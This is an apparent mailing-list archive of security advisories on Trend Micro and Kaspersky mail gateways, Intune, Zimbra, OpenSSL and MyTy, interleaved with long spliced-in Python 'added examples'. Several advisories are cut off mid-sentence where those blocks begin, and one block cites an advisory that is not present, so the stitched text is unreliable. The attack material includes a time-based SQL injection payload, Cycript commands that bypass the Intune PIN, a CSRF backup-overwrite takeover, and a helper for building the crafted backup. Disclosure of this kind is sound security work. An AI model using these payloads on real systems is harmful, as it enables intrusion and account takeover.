[CORE-2017-0006] Trend Micro Email Encryption Gateway Multiple Vulnerabilities

2018-02-21 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Trend Micro Email Encryption Gateway Multiple Vulnerabilities

1. *Advisory Information*

Title: Trend Micro Email Encryption Gateway Multiple Vulnerabilities
Advisory ID: CORE-2017-0006
Advisory URL:
http://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities
Date published: 2018-02-21
Date of last update: 2018-02-21
Vendors contacted: Trend Micro
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cleartext Transmission of Sensitive Information [CWE-319],
External Control of File Name or Path [CWE-73], Insufficient
Verification of Data Authenticity [CWE-345], External Control of File
Name or Path [CWE-73], Missing Authentication for Critical Function
[CWE-306], Cross-Site Request Forgery [CWE-352], Improper Restriction of
XML External Entity Reference [CWE-611], Improper Neutralization of
Input During Web Page Generation ('Cross-site Scripting') [CWE-79],
Improper Neutralization of Input During Web Page Generation ('Cross-site
Scripting') [CWE-79], Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of
Special Elements used in an SQL Command [CWE-89], Improper
Neutralization of Special Elements used in an SQL Command [CWE-89],
Improper Neutralization of Special Elements used in an SQL Command
[CWE-89]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-6219, CVE-2018-6220, CVE-2018-6221, CVE-2018-6222,
CVE-2018-6223, CVE-2018-6224, CVE-2018-6225, CVE-2018-6226,
CVE-2018-6226, CVE-2018-6227, CVE-2018-6228, CVE-2018-6229, CVE-2018-6230

3. *Vulnerability Description*

Trend Micro's website states that:[1]

"Encryption for Email Gateway is a Linux-based software solution providing
the ability to perform the encryption and decryption of email at the
corporate gateway, regardless of the email client, and the platform from
which it originated. The encryption and decryption of email on the TMEEG
client is controlled by a Policy Manager that enables an administrator
to configure policies based on various parameters, such as sender and
recipient email addresses, keywords, or PCI compliance. Encryption for
Email Gateway presents itself as an SMTP interface and delivers email
out over an SMTP to configured outbound MTAs. This enables easy
integration with other email server-based products, be them content
scanners, mail servers, or archiving solutions."
 
Multiple vulnerabilities were found in the Trend Micro Email Encryption
Gateway web console that would allow a remote unauthenticated attacker
to gain command execution as root.

We also present two additional vectors to achieve code execution from a
man-in-the-middle position.
 
4. *Vulnerable Packages*

. Trend Micro Email Encryption Gateway 5.5 (Build .00)
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Trend Micro published the following Security Notes:

.
https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
and Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from Core
Advisories Team.
   
7. *Technical Description / Proof of Concept Code*

Trend Micro Email Encryption Gateway includes a web console to perform
administrative tasks. Section 7.4 describes a vulnerability in this
console that can be exploited to gain command execution as root. The
vulnerable functionality is accessible only to authenticated users, but
it is possible to combine 7.4 with the vulnerability presented in
section 7.5 to bypass this restriction and therefore execute root
commands from the perspective of a remote unauthenticated attacker.
 
The application does also use an insecure update mechanism that allows
an attacker in a man-in-the-middle position to write arbitrary files and
install arbitrary RPM packages, leading to remote command execution as
the root user.
 
Additional Web application vulnerabilities were found, including
cross-site request forgery (7.6), XML external entity injection (7.7),
several cross-site scripting vulnerabilities (7.8, 7.9, 7.10), and SQL
injection vulnerabilities (7.11, 7.12, 7.13).
 
7.1. *Insecure update via HTTP*

[CVE-2018-6219]
Communication to the update servers is unencrypted. The following URL is
fetched when the application checks for updates:
 
/-
[Request #1]
 http://downloads.privatepost.com/files/TMEEG/updates/data.html
-/

The product expects to retrieve a plain-text file with the following
format:

/-
[Version Info]
[Installation RPM file name]
[Path to release notes]
-/

If a new update is found, then the RPM file is downloaded
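
The update check described in 7.1 hands the product three attacker-influenced
strings over plain HTTP: a version, an RPM file name and a release-notes path.
The following is an added example (not Trend Micro's code) that parses that
same three-line manifest two ways: as the advisory describes it, trusting every
field, and hardened so that the RPM name must be a bare basename (the CWE-73
case), the notes path cannot escape the update directory, the download URL must
be HTTPS on a pinned host, and the package digest is checked against a value
obtained out of band. The host name, digests and sample manifests are
placeholders constructed for the example.

```python
"""Hardened handling of a 3-line update manifest (added example; not Trend Micro's code).

The advisory describes a plain-text manifest fetched over HTTP:
    line 1: version info
    line 2: installation RPM file name
    line 3: path to release notes
Everything below assumes that layout; the URL, host name and digest values
are placeholders chosen for the example.
"""
import hashlib
import posixpath
import re
from dataclasses import dataclass
from urllib.parse import urljoin, urlsplit

UPDATE_BASE = "https://updates.example.invalid/files/TMEEG/updates/"  # placeholder, not the real server
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.rpm$")


class ManifestError(ValueError):
    pass


@dataclass(frozen=True)
class Manifest:
    version: tuple
    rpm_name: str
    notes_path: str


def parse_version(text: str) -> tuple:
    """'5.5.1107' -> (5, 5, 1107); anything that is not dotted digits is rejected."""
    if not re.fullmatch(r"\d+(\.\d+)*", text.strip()):
        raise ManifestError(f"bad version string: {text!r}")
    return tuple(int(p) for p in text.strip().split("."))


def parse_manifest_insecure(body: str) -> Manifest:
    """What the advisory describes: every field is trusted as delivered."""
    lines = body.splitlines()
    return Manifest(parse_version(lines[0]), lines[1].strip(), lines[2].strip())


def parse_manifest(body: str) -> Manifest:
    """Hardened parser: fixed shape, bare RPM basename, notes path kept under the base."""
    lines = [l.strip() for l in body.splitlines() if l.strip()]
    if len(lines) != 3:
        raise ManifestError(f"expected 3 lines, got {len(lines)}")
    version = parse_version(lines[0])
    rpm_name = lines[1]
    if not _SAFE_NAME.match(rpm_name):
        raise ManifestError(f"RPM name rejected (CWE-73): {rpm_name!r}")
    # Normalise against a fake root so '..' components cannot climb out.
    notes = posixpath.normpath("/" + lines[2].lstrip("/"))
    return Manifest(version, rpm_name, notes.lstrip("/"))


def update_url(manifest: Manifest, base: str = UPDATE_BASE) -> str:
    """Build the RPM URL and refuse anything that is not HTTPS on the pinned host."""
    url = urljoin(base, manifest.rpm_name)
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.netloc != urlsplit(base).netloc:
        raise ManifestError(f"refusing non-HTTPS or off-host download: {url}")
    return url


def is_newer(manifest: Manifest, installed: str) -> bool:
    """Numeric comparison; string comparison would rank '5.10' below '5.9'."""
    return manifest.version > parse_version(installed)


def verify_rpm(blob: bytes, expected_sha256: str) -> bool:
    """Pin the package digest to a value obtained out of band (a signed manifest);
    transport security alone does not authenticate the package."""
    return hashlib.sha256(blob).hexdigest() == expected_sha256.lower()
```

Before installing, the package's own signature should still be checked with
rpm --checksig; the digest pin above only guards the download step.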

CSNC-2017-027 Microsoft Intune - App PIN Bypass

2018-02-13 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  Microsoft Intune [1]
# Vendor:   Microsoft
# CSNC ID:  CSNC-2017-027
# Subject:  App PIN Bypass
# Risk: Medium
# Effect:   Locally exploitable
# Author:   Stephan Sekula <stephan.sek...@compass-security.com>
# Date: 31.08.2017
#
#

Introduction:
-
Define a mobile management strategy that fits the needs of your organization. 
Apply flexible mobile device and app management controls that let employees 
work with the devices and apps they choose while protecting your company 
information. [1]

Compass Security discovered a design weakness in Microsoft Intune's app 
protection. This weakness allows a malicious user that gets hold of an 
employee's iOS device to access company data even without knowing the app PIN.


Technical Description
-
Microsoft Intune supports protection policies such as requiring a PIN to access 
a managed app. In the current implementation however, the app PIN is used to 
show and hide an overlay screen, restricting access to the files using the UI 
only.

Therefore, if the device is jailbroken, a simple Cycript script can be written 
to hide the overlay and use the UI to access all stored files.

To bypass the PIN, one needs to find the app's process ID (PID):
# ps aux | grep OneDrive
mobile    2086   1.2  4.9  1287904 100480   ??  Ss   11:06AM   0:05.59
/var/containers/Bundle/Application/AE292B95-58D2-4ECE-B7DF-767F0679706C/OneDrive.app/OneDrive

Attach to the app's process using Cycript and list the current view's details:
# cycript -p 2086
cy# UIApp.keyWindow.recursiveDescription().toString()
; layer = >
   | >
   || [CUT BY COMPASS]
   |||| >

Now, the overlay window can be hidden:
cy# [#0x105088e00 setHidden: YES]

The above command will lead to the PIN request window to be hidden, hence, 
granting access to the files using the mobile app UI.


Workaround / Fix:
-
The PIN protection mechanism should be revisited. One solution would be, to 
encrypt all documents using a key derived from the user's PIN, hence rendering 
a simple Cycript bypass code useless.

Furthermore, the app should verify whether the user's device is jailbroken, and 
if a jailbreak is detected, all managed apps and their data should be wiped 
from the device.


Timeline:
-
2017-08-22: Discovery by Stephan Sekula
2017-09-17: Initial vendor notification
2017-09-18: Initial vendor response
2017-10-04: Asking vendor for an update
2017-10-04: Vendor replies that engineers are working on reproducing the
issue
2017-11-01: Asking vendor for an update
2017-11-02: Vendor replies that the root cause is a vulnerability in iOS.
Case is marked as won't fix.
2018-02-13: Public disclosure


References:
---
[1] https://www.microsoft.com/en-us/cloud-platform/microsoft-intune
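
The fix section above proposes encrypting managed documents with a key derived
from the app PIN. An added example follows (not Intune code) showing the
failure mode a practitioner should weigh before adopting that design: a PIN has
only a few digits, and an attacker on a jailbroken device already holds the
encrypted files, so a PIN-only key can be brute-forced offline in seconds. Mixing
in a secret that never leaves the device (a Secure Enclave-held key, for
instance) makes the same search fail without the hardware. The salt, iteration
count and the random "device secret" are placeholders for the demonstration.

```python
"""Why a PIN-derived key needs a device-bound secret (added example; not Intune code).

derive_key(pin) is the PIN-only design; derive_key(pin, device_secret) mixes
in a per-device secret. brute_force_pin() plays the offline attacker who has
the stored verifier tag (any AEAD over the documents would give an equivalent
oracle) and tries every PIN.
"""
import hashlib
import hmac
import os
from itertools import product
from typing import Optional

ITERATIONS = 100            # deliberately low so the brute-force demo runs in seconds;
                            # real deployments use 100k+ or a memory-hard KDF
SALT = b"constructed-salt"  # per-user random salt in practice


def derive_key(pin: str, device_secret: bytes = b"", salt: bytes = SALT) -> bytes:
    """PBKDF2-HMAC-SHA256 over PIN || device_secret. With device_secret == b""
    this is the PIN-only scheme the advisory sketches."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode() + device_secret, salt, ITERATIONS, 32)


def make_verifier(key: bytes) -> bytes:
    """Tag the app would store to test a PIN locally."""
    return hmac.new(key, b"verifier", hashlib.sha256).digest()


def brute_force_pin(verifier: bytes, digits: int = 4,
                    device_secret: bytes = b"") -> Optional[str]:
    """Offline attacker: try every PIN against the stored verifier."""
    for combo in product("0123456789", repeat=digits):
        pin = "".join(combo)
        if hmac.compare_digest(make_verifier(derive_key(pin, device_secret)), verifier):
            return pin
    return None


def demo() -> dict:
    pin = "4271"
    device_secret = os.urandom(32)            # stands in for a Secure Enclave-held key
    weak = make_verifier(derive_key(pin))     # PIN-only
    strong = make_verifier(derive_key(pin, device_secret))
    return {
        "pin_only_recovered": brute_force_pin(weak),          # "4271"
        "device_bound_recovered": brute_force_pin(strong),    # None: attacker lacks device_secret
        "device_bound_with_secret": brute_force_pin(strong, device_secret=device_secret),
    }
```

The third result shows the device-bound key still works for the legitimate
app; only the offline guess without the hardware secret fails, which is why the
device's own attempt limiting is the real defence and the PIN alone is not.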


[CORE-2017-0010] - Kaspersky Secure Mail Gateway Multiple Vulnerabilities

2018-02-05 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Kaspersky Secure Mail Gateway Multiple Vulnerabilities

1. *Advisory Information*

Title: Kaspersky Secure Mail Gateway Multiple Vulnerabilities
Advisory ID: CORE-2017-0010
Advisory URL:
http://www.coresecurity.com/advisories/kaspersky-secure-mail-gateway-multiple-vulnerabilities
Date published: 2018-02-01
Date of last update: 2018-02-01
Vendors contacted: Kaspersky Lab
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cross-Site Request Forgery [CWE-352], Improper Neutralization of
Special Elements in Output Used by a Downstream Component [CWE-74], Improper
Privilege Management [CWE-269], Improper Neutralization of Input During Web
Page Generation [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2,
CVE-pending-assignment-3, CVE-pending-assignment-4

3. *Vulnerability Description*

From Kaspersky Lab's website:

Kaspersky Secure Mail Gateway [1] gives you a fully integrated email
system; mail security solution - including anti-spam, anti-malware,
anti-phishing and more - in a single virtual appliance. It's easy to
install and manage - so you save time on day-to-day mail and mail
security tasks, while we deliver award-winning security that helps you
keep your business safe and boost user productivity.

Multiple vulnerabilities were found in the Kaspersky Mail Gateway Web
Management Console. It is possible for a remote attacker to abuse these
vulnerabilities and gain command execution as root.

4. *Vulnerable Packages*

Kaspersky Secure Mail Gateway 1.1.0.379
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Kaspersky Labs published the following advisory
   . https://support.kaspersky.com/vulnerability.aspx?el=12430#010218

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
from Core Security Consulting Services. The publication of this advisory
was coordinated by Alberto Solino from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

Kaspersky Secure Mail Gateway is a virtual appliance designed to be
deployed inside the organization's network infrastructure. It comes
bundled with a Web Management Console to monitor the application status
and manage its operation.

This Management Console provides no cross-site request forgery
protection site-wide, which could result in administrative account
takeover as shown in 7.1.

In addition, an attacker who manages to get access to the Web Console
could gain command execution as root (7.2) by injecting arbitrary
content into the appliance's Postfix configuration.

It is also possible to elevate privileges from kluser to root (7.3) by
abusing a setuid binary shipped with the appliance, which executes a
script located on an attacker-controlled location with root privileges.

Apart from this, a reflected cross-site scripting vulnerability (7.4)
was found which affects the Management Console.

7.1. *Cross-site Request Forgery leading to Administrative account takeover*

[CVE-pending-assignment-1]
There are no Anti-CSRF tokens in any forms on the Web interface. This
would allow an attacker to submit authenticated requests when an
authenticated user browses an attacker-controlled domain.

The "Import Application Settings" feature is particularly interesting
because it allows users to restore a backup file that overwrites the
appliance's configuration.

A settings backup file contains five zlib segments:

/-
$ binwalk KSMG_settings.kz

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
16            0x10            Zlib compressed data, default compression
39            0x27            Zlib compressed data, default compression
2242          0x8C2           Zlib compressed data, default compression
2268          0x8DC           Zlib compressed data, default compression
3072          0xC00           Zlib compressed data, default compression

-/
The last segment is a compressed backup of /var/opt/kaspersky/klms/db
/passwd, which contains a list of usernames, passwords, and profiles,
for example:

/-
# cat /var/opt/kaspersky/klms/db/passwd
Administrator:7{E{I'}Ap{RpY~t/V28\lZ&,FM&97s5`6f5e51bd7ade638785f5e7476351839e:admin
-/

An attacker can craft a backup file that contains its own passwd file,
and then submit it by abusing the CSRF vulnerability.

The appliance then overwrites the original passwd file giving the
attacker access to Administrator account.

The following proof-of-concept request restores only account information
in order to avoid changing appliance's current configuration. Please
note that the file contents were removed to make it more readable.

/-
POST /ksmg/cgi-bin/klwi?action=importSettings=CC3262C5 HTTP/1.1
Host: server
User-Ag
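
Section 7.1 relies on knowing where the zlib segments of a settings backup sit
and that the last one holds the passwd file. The following is an added example
(neither Kaspersky's nor binwalk's code) that does what the binwalk listing
shows: it walks a blob, tests each byte pair against the RFC 1950 zlib header
rule, inflates from every hit and records where each stream ends, so a backup
can be taken apart segment by segment. The container built by
build_sample_container() is constructed for the demo; the real file's framing
bytes between segments are not documented on the page.

```python
"""Locate and inflate zlib streams inside an opaque blob (added example; not
Kaspersky's or binwalk's code). inflate_at() also returns the compressed
length of each stream, which binwalk's listing does not show.
"""
import zlib
from dataclasses import dataclass
from typing import List


@dataclass
class ZlibSegment:
    offset: int        # where the 2-byte zlib header starts
    length: int        # compressed length including header and adler32 trailer
    data: bytes        # inflated payload


def looks_like_zlib_header(cmf: int, flg: int) -> bool:
    """RFC 1950: CM must be 8 (deflate), CINFO <= 7, and CMF*256+FLG a multiple of 31."""
    return (cmf & 0x0F) == 8 and (cmf >> 4) <= 7 and ((cmf << 8) | flg) % 31 == 0


def inflate_at(blob: bytes, offset: int) -> ZlibSegment:
    """Inflate one stream starting at offset; raises zlib.error if it is not one."""
    d = zlib.decompressobj()
    data = d.decompress(blob[offset:])
    if not d.eof:
        raise zlib.error("truncated stream")
    consumed = len(blob) - offset - len(d.unused_data)
    return ZlibSegment(offset, consumed, data)


def scan_zlib(blob: bytes) -> List[ZlibSegment]:
    """Try every plausible header; on a stream that inflates, skip past it."""
    segs, i = [], 0
    while i + 1 < len(blob):
        if looks_like_zlib_header(blob[i], blob[i + 1]):
            try:
                seg = inflate_at(blob, i)
                segs.append(seg)
                i += seg.length
                continue
            except zlib.error:
                pass
        i += 1
    return segs


def build_sample_container(passwd: bytes) -> bytes:
    """Five zlib segments behind made-up framing bytes (constructed; NOT KSMG's real layout)."""
    parts = [b"<settings-1/>", b"<settings-2/>", b"x", b"y", passwd]
    out = b"KSMG\x00\x01"                      # fake magic
    for p in parts:
        out += b"\xff\xee" + zlib.compress(p)  # fake per-segment marker + stream
    return out


def dump_passwd(blob: bytes) -> str:
    """Per the advisory, the last of the five zlib segments is the passwd backup."""
    segs = scan_zlib(blob)
    if len(segs) != 5:
        raise ValueError(f"expected 5 zlib segments, found {len(segs)}")
    return segs[-1].data.decode()
```

Because the scanner records offset and compressed length, the same segments can
be cut out and re-assembled around a replacement payload, which is the step the
advisory describes for a crafted backup; the framing bytes around each stream
must be carried over from the original file.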

CVE-2017-8802 Zimbra Collaboration Suite - Stored Cross-Site Scripting

2018-01-11 Thread Advisories

#
# COMPASS SECURITY ADVISORY https://www.compass-security.com

#
# CVE ID : CVE-2017-8802
# Product: Zimbra Collaboration Suite (ZCS) [1]
# Vendor:  Synacor Inc. [2]
# Subject: Stored Cross-Site Scripting (XSS) Vulnerability
# Risk:High
# Effect:  Exploitable by Anonymous Internet Adversaries
#  Triggered in the Context of an Authenticated Zimbra Email User
# Authors: Damian Pfammatter (damian.pfammat...@compass-security.com)
#  Alessandro Zala   (alessandro.z...@compass-security.com)
# Date:January 10th 2018
#



Introduction:
-
The Zimbra Collaboration Suite (ZCS) is a collaborative software suite that
includes Email servers as well as Email clients. According to the product
website, more than 500 million people are currently using the Email
collaboration tool [1].

Security Analysts of Compass Security Schweiz AG [3] discovered a Stored
Cross-Site Scripting (XSS) vulnerability in the Zimbra Email web client,
potentially resulting in a number of different attack scenarios.


Affected Versions:
--
No confirmed information about all affected versions is available. Versions
prior to 8.8 GA Release are likely affected.


Technical Description:
--
The Zimbra Email web client is affected by a Stored Cross-Site Scripting (XSS)
vulnerability.

Remote attackers can target the vulnerability by sending an Email with an XSS
payload (e.g. JavaScript) in its body. In case the recipient selects the email
in the Zimbra client and accesses the "Show Snippet" functionality using the
"Q" shortcut, the XSS payload is executed in the context of the recipient's
Zimbra client.

For example through social engineering, attackers could bring their victims
into pressing "Q" while reading the compromised email, triggering the payload.
Among other things, the malicious payload could compromise the confidentiality,
integrity as well as availability of the victim's emails. It could also be
possible to change Zimbra settings of the corresponding victim.


Hotfix:
---
The corresponding patch has been released in version 8.8.0 Beta2 [4] (Bug
#107925). The patch is part of public release 8.8 GA Release.


Timeline:
-
2017-05-04: Vulnerability discovered
2017-05-05: Initial vendor notification
2017-05-05: Vendor confirmed security issue
2017-05-05: MITRE reserved CVE-2017-8802 for the issue
2017-12-12: Vendor released security fix & guidance to its customers
2018-01-10: Public disclosure


References:
---
[1] https://www.zimbra.com/
[2] https://www.synacor.com/
[3] https://www.compass-security.com/research/advisories/
[4] https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories


FreeBSD Security Advisory FreeBSD-SA-17:12.openssl

2017-12-11 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:12.openssl                                   Security Advisory
  The FreeBSD Project

Topic:  OpenSSL multiple vulnerabilities

Category:   contrib
Module: openssl
Announced:  2017-12-09
Affects:        All supported versions of FreeBSD.
Corrected:  2017-12-07 18:04:48 UTC (stable/11, 11.1-STABLE)
2017-12-09 03:44:26 UTC (releng/11.1, 11.1-RELEASE-p6)
2017-12-09 03:41:31 UTC (stable/10, 10.4-STABLE)
2017-12-09 03:45:23 UTC (releng/10.4, 10.4-RELEASE-p5)
2017-12-09 03:45:23 UTC (releng/10.3, 10.3-RELEASE-p26)
CVE Name:   CVE-2017-3737, CVE-2017-3738

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

FreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit for the Transport Layer Security (TLS) and Secure Sockets
Layer (SSL) protocols.  It is also a full-strength general purpose
cryptography library.

II.  Problem Description

Invoking SSL_read()/SSL_write() while in an error state causes data to be
passed without being decrypted/encrypted directly from the SSL/TLS record
layer.

In order to exploit this issue an application bug would have to be present
that resulted in a call to SSL_read()/SSL_write() being issued after having
already received a fatal error.  [CVE-2017-3737]

There is an overflow bug in the x86_64 Montgomery multiplication procedure
used in exponentiation with 1024-bit moduli.  This only affects processors
that support the AVX2 but not ADX extensions like Intel Haswell (4th
generation).  [CVE-2017-3738]  This bug only affects FreeBSD 11.x.

III. Impact

Applications with incorrect error handling may inappropriately pass
unencrypted data.  [CVE-2017-3737]

Mishandling of carry propagation will produce incorrect output, and make it
easier for a remote attacker to obtain sensitive private-key information.  No
EC algorithms are affected and analysis suggests that attacks against RSA and
DSA as a result of this defect would be very difficult to perform and are not
believed likely.

Attacks against DH1024 are considered just feasible (although very difficult)
because most of the work necessary to deduce information about a private key
may be performed offline.  The amount of resources required for such an
attack would be very significant and likely only accessible to a limited
number of attackers.  However, for an attack on TLS to be meaningful, the
server would have to share the DH1024 private key among multiple clients,
which is no longer an option since CVE-2016-0701.  [CVE-2017-3738]

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Restart all daemons that use the library, or reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Restart all daemons that use the library, or reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.x]
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-10.patch
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-10.patch.asc
# gpg --verify openssl-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-11.patch
# fetch https://security.FreeBSD.org/patches/SA-17:12/openssl-11.patch.asc
# gpg --verify openssl-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/10/r326
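
Each of the FreeBSD advisories above (SA-18:01 in both revisions and SA-17:12)
tells you to run gpg --verify on the detached signature and then apply the
patch, but a bare gpg --verify only prints a verdict: nothing stops the next
command from running when the check fails, or when the signature is good but
made by some other key in your keyring. The following added example (not
FreeBSD's code) drives gpg with --status-fd, parses its machine-readable
output, and applies the patch only on a VALIDSIG whose primary-key fingerprint
matches a pinned value. EXPECTED_FPR is a placeholder, not the FreeBSD Security
Officer fingerprint; substitute the one you have verified out of band.

```python
"""Gate `patch` on a pinned GnuPG signature check (added example; not FreeBSD code)."""
import subprocess
from dataclasses import dataclass
from typing import Iterable, Optional

# Placeholder: put the FreeBSD Security Officer key fingerprint you verified
# out of band here. This value is NOT the real fingerprint.
EXPECTED_FPR = "0000000000000000000000000000000000000000"


@dataclass
class SigResult:
    good: bool                  # gpg reported VALIDSIG and nothing that voids it
    fingerprint: Optional[str]  # primary key fingerprint from VALIDSIG, if seen
    pinned: bool                # fingerprint matches the expected one


def parse_status(lines: Iterable[str], expected_fpr: str = EXPECTED_FPR) -> SigResult:
    """Parse `gpg --status-fd` output.

    VALIDSIG carries the signing-key fingerprint in field 3 and the primary
    key fingerprint as its last field; pinning on the primary means a rotated
    signing subkey under the same primary still verifies. Any BADSIG, ERRSIG,
    NO_PUBKEY, EXPKEYSIG or REVKEYSIG line voids the result regardless of order.
    """
    good, fpr = False, None
    for line in lines:
        parts = line.split()
        if len(parts) < 2 or parts[0] != "[GNUPG:]":
            continue
        if parts[1] == "VALIDSIG" and len(parts) >= 4:
            good, fpr = True, parts[-1].upper()
        elif parts[1] in ("BADSIG", "ERRSIG", "NO_PUBKEY", "EXPKEYSIG", "REVKEYSIG"):
            return SigResult(False, None, False)
    return SigResult(good, fpr, good and fpr == expected_fpr.upper())


def verify_detached(sig_path: str, data_path: str,
                    expected_fpr: str = EXPECTED_FPR) -> SigResult:
    """Run gpg on a detached signature and parse its status lines."""
    proc = subprocess.run(
        ["gpg", "--batch", "--status-fd", "1", "--verify", sig_path, data_path],
        capture_output=True, text=True, check=False)
    return parse_status(proc.stdout.splitlines(), expected_fpr)


def apply_verified_patch(patch_path: str, srcdir: str = "/usr/src",
                         expected_fpr: str = EXPECTED_FPR) -> None:
    """Apply patch_path under srcdir only if patch_path + '.asc' verifies against the pin."""
    res = verify_detached(patch_path + ".asc", patch_path, expected_fpr)
    if not res.good:
        raise RuntimeError(f"{patch_path}: signature did not verify")
    if not res.pinned:
        raise RuntimeError(f"{patch_path}: signed by unexpected key {res.fingerprint}")
    with open(patch_path, "rb") as fh:
        subprocess.run(["patch"], cwd=srcdir, stdin=fh, check=True)


if __name__ == "__main__":
    import sys
    apply_verified_patch(sys.argv[1], *sys.argv[2:3])
```

Usage is python3 apply_patch.py openssl-11.patch /usr/src after fetching both
the patch and its .asc into the current directory; the step c) rebuild from the
advisory is unchanged.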

CSNC-2017-029 MyTy Blind SQL Injection

2017-11-21 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-029
# CVE ID:   -
# Subject:  Blind SQL injection
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date: 21.11.2017
#
#

Introduction:
-
MyTy[1] is a software framework that includes a crowdfunding module. It can be 
installed on a customer server and used to create whitelabel websites for 
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding 
module login process that allows an unauthenticated attacker to execute 
arbitrary SQL query against the database. This allows to read and modify the 
whole database, within the privilege limitations of the database user executing 
the queries.


Affected:
-
Vulnerable:
 * MyTy 5.0.4 to 5.1.6
 
 
Technical Description
-
During the login process, the user email and password are sent in a POST 
request. In this request, the login_email parameter is concatenated into an SQL 
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following 
request:
===
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
=simpleLogin=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
 lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; 
 _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; 
 cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1===%252Fprojekte%252Fsuchergebnisse.html%253F
_type=inline=1=simpleLogin
_email=test'%2b(select*from(select(sleep(20)))a)%2b'_password=1234
===


Workaround / Fix:
-
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL 
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a 
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
-
2017-11-21: Coordinated public disclosure date
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7
2017-09-06: Initial vendor response
2017-09-06: Initial vendor notification
2017-09-06: Discovery by Nicolas Heiniger


References:
---
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap
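
The Technical Description above shows login_email concatenated into the query
and a MySQL time-based payload, and the fix says to use prepared statements. The
following added example (not MyTy's code) reproduces both sides offline: an
in-memory SQLite database with a user-registered sleep() standing in for
MySQL's SLEEP(), a login that builds the query by concatenation exactly as the
advisory describes, and the parameterized version beside it. The schema, the
row and the shortened delay are constructed for the demonstration; the payload
shape is the advisory's.

```python
"""Concatenated vs parameterized login query (added example; not MyTy's code).
SQLite with a user-registered sleep() so the advisory's time-based payload
can be reproduced offline; the schema and rows are constructed.
"""
import sqlite3
import time
from typing import Optional, Tuple

# Shape taken from the advisory's request; the 20-second delay is shortened.
PAYLOAD = "test'+(select*from(select(sleep(0.3)))a)+'"


def _sleep(seconds: float) -> int:
    """Stand-in for MySQL's SLEEP(): block, then return 0 like MySQL does."""
    time.sleep(seconds)
    return 0


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
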